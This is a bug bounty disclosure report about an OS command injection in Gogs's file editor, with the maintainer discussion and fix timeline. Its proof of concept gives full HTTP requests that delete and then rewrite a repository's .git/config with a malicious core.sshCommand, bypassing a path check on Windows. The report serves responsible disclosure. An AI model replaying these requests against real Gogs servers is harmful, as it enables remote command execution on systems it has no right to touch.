OS Command Injection in file editor in gogs/gogs

Valid

Reported on

Jun 1st 2022


Description

Deploy and run gogs.

Proof of Concept

  1. Create a repository and upload a file named config to the repository repo6. The content of the file is as follows:
[core]
    repositoryformatversion = 0
    filemode = true
    bare = false
    logallrefupdates = true
    ignorecase = true
    precomposeunicode = true
    sshCommand = notepad
[remote "origin"]
    url = git@github.com:torvalds/linux.git
    fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
    remote = origin
    merge = refs/heads/master

2.The attacker can remove the .git/config file.

http request:

POST /admin1/repo6/_delete/master/.git/config HTTP/1.1
Host: 192.168.1.59:3000
Content-Length: 130
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: lang=zh-CN; i_like_gogs=858a2bd132c75d53
Connection: close

_csrf=PuAr2ZVY2NpoEOR1se-J81LVboM6MTY1NDAwODAzNDgzNDEwOTAwMA&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=

  1. The attacker can set tree_path tree_path=.git/config to move a file into the .git/config directory.

http request:

POST /admin1/repo6/_edit/master/aaa/config HTTP/1.1
Host: 192.168.1.59:3000
Content-Length: 722
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: lang=zh-CN; i_like_gogs=858a2bd132c75d53
Connection: close

_csrf=CQ7KgJoDP2oI1xKrj0bx1GtYiQ46MTY1NDAwNzk1MjA5ODk5MTQwMA&last_commit=11e2a5c721b9f9cbe4bb32bcdcc6318794e350ff&tree_path=.git%2Fconfig&content=%5Bcore%5D%0D%0A++++repositoryformatversion+%3D+0%0D%0A++++filemode+%3D+true%0D%0A++++bare+%3D+false%0D%0A++++logallrefupdates+%3D+true%0D%0A++++ignorecase+%3D+true%0D%0A++++precomposeunicode+%3D+true%0D%0A++++sshCommand+%3D+notepad%0D%0A%5Bremote+%22origin%22%5D%0D%0A++++url+%3D+git%40github.com%3Atorvalds%2Flinux.git%0D%0A++++fetch+%3D+%2Brefs%2Fheads%2F*%3Arefs%2Fremotes%2Forigin%2F*%0D%0A%5Bbranch+%22master%22%5D%0D%0A++++remote+%3D+origin%0D%0A++++merge+%3D+refs%2Fheads%2Fmaster%0D%0A%0D%0A%0D%0A&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=

Note: Write or rewrite the .git/config file ( the core.sshCommand was already set), which leads to remote command execution vulnerability.

Then the command notepad executed on the server.

Impact

1.This vulnerability is capable of executing commands on the remote server and gain the privileged user account, which leads sensitive data exposure, identity theft, etc.

2.Delete arbitrary files, such as gogs/custom/conf/app.ini

3.Write the file to another path.

We are processing your report and will contact the gogs team within 24 hours. 25 days ago
1135
25 days ago

Researcher


The video is here. https://streamable.com/2g0gn6 For privacy reasons, it will be deleted in about a week.

We have contacted a member of the gogs team and are waiting to hear back 24 days ago
Joe Chen
24 days ago

Maintainer


Thanks for the report!

Could you specific which commit you're testing against?

I think the second part "The attacker can set tree_path tree_path=.git/config to move a file into the .git/config directory." has already been reported and fixed in https://github.com/gogs/gogs/commit/90bc75229726a24a28507d3e8178f86734f112e1

1135
24 days ago

Researcher


The test was done on the commit you just mentioned. (=0.12.8)

This is the newly discovered bypass. This RCE is currently only reproduced in Windows.

Using os.PathSeparator only in isRepositoryGitPath actually lacks consideration.

As we known, the os.PathSeparator is equivalent to \ in Windows.

However, the test found that either / or \ can write files to directories in gogs.

So both / and \ should be considered.

1135
24 days ago

Researcher


Another vulnerability is path traversal, which may be independent of the system and can delete arbitrary files.

The .. should be considered. Such as here https://github.com/gogs/gogs/blob/509a392272a2ba2bde9d64bf5a55a58d0eadccc4/internal/tool/path.go#L21

Joe Chen
23 days ago

Maintainer


Got it, will try to reproduce.

Regarding "delete arbitrary files", do you want to create another report?

1135
23 days ago

Researcher


Yes. https://huntr.dev/bounties/2e8cdc57-a9cf-46ae-9088-87f09e6c90ab/

gogs/gogs maintainer has acknowledged this report 23 days ago
Joe Chen validated this vulnerability 23 days ago
1135 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the gogs team. We will try again in 7 days. 20 days ago
Joe Chen confirmed that a fix has been merged on 38aff7 18 days ago
The fix bounty has been dropped
repo_editor.go#L468-L484 has been validated
to join this conversation